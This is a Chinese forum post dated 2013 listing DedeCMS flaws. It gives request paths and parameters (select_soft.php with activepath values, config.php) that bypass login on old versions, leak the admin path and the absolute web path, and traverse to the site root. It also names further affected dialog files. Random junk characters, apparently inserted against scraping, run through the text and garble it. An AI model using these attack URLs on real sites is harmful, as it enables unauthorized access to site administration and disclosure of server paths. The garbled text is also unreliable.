1.include/dialog/select_soft.php文件可以爆出DEDECMS的后台,以前的老板本可以跳过登陆验证直接访问,无需管理
# r" {6 W/ l6 m5 w, R9 B
7 V, ~# O6 T1 L8 @员帐号,新版本的就直接转向了后台.
3 w; ?6 U' w9 z: { W3 y- Q3 b
. y$ U4 ~0 f8 N7 F. ]2.include/dialog/config.php会爆出后台管理路径
+ e" X8 o8 y4 q$ b/ `; _% ^6 Q8 m4 P( c# Z$ U. U
3.include/dialog/select_soft.php?activepath=/include/FCKeditor 跳转目录
! }6 I) P6 y7 F
! D+ z7 L1 G k9 \; L8 a4.include/dialog/select_soft.php?activepath=/st0pst0pst0pst0pst0pst0pst0pst0p 爆出网站绝对路径.
. N7 B. h7 q7 b/ B) A7 J, K) W6 \2 ^9 m9 _4 I: F. v) t) i4 i
5.另外一些低版本的DEDECMS访问这个页面的时候会直接跳过登陆验证,直接显示,而且还可以用/././././././././掉
z7 T3 c- c9 ]6 C+ m$ Y$ ^! o( L* t- J3 E; v" D% @
到根目录去.不过这些版本的访问地址有些不同.
5 Z" g2 n9 K% v! D9 ^9 i( f' T地址为require/dialog/select_soft.php?activepath=/././././././././. L. P5 Z5 f. u. [3 g! d
, [3 `% R5 U# Y1 Xinclude\dialog\目录下的另外几个文件都存在同一个问题,只是默认设的目录不同.有些可以查看HTML这些文件哦..- }9 M# ]% W1 c4 s* O' h1 n
存在相同问题的文件还有5 X8 m; J5 y0 @
include\dialog\select_images.php; E+ c }" v! a. R, Y7 o! G' @
include\dialog\select_media.php4 p; D o, |. y1 v3 V4 ]
include\dialog\select_templets.php
4 ^( P6 C' `6 E9 z |
发表于 2013-4-16 16:50:43
收藏
支持
反对